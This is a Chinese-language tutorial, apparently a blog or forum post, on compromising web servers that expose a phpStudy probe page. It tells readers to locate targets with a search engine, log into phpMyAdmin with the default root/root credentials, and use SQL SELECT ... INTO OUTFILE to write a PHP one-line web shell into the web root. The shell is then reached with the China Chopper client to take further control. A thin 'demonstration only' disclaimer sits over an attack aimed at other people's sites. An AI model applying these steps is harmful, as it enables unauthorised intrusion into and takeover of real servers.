利用phpStudy 探针 提权网站服务器

声明:

本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途!

---

• 今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器，这个挺简单的.记录一下吧。

• 搜索引擎KeyWord：

phpStudy 探针 2014

• 多往后翻翻。翻个几十页最好。

• 点开搜索到的内容。

点开搜索到的内容。

翻到最下面，尝试连接mysql数据库是否正常(账号密码默认为：root)：

1、 如果提示正常。请在网页后面加上 ‘phpmyadmin’，如 http://www.baidu.com/phpmyadmin

2、 然后回车即可。

3、 出现以下界面；默认账号密码尝试登陆;

4、 登陆成功后，第一步找到左边导航栏的MYSQL，然后点击上面的SQL，如图

5、 (点击mysql后，右侧表单会增加很多内容，不要理会他，直接点表单上方的SQL按钮即可。)

6、 下面往SQL写入一句话木马，然后用菜刀连接即可！

1、 图片效果不好,贴出代码,自行对比一下子- -
2、 Code:

mysq1
sql 语句
Drop TABLE IF EXISTS 菜刀连接密码;
Create TABLE 自定义一个表名(cmd text NOT NULL);
Insert INTO 自定义一个表名 (cmd) VALUES('');
Select cmd from 自己编写 into outfile 'D:/WWW/菜刀连接地址.php';['左边绝对地址需要根据网页自行更改']
Drop TABLE IF EXISTS 用户和密码;

---

7、 添加完成后，使用菜刀连接；

后面tmp.php是在写入SQL一句话木马那自定义设置的。

成功连上！可自行提权服务器等操作!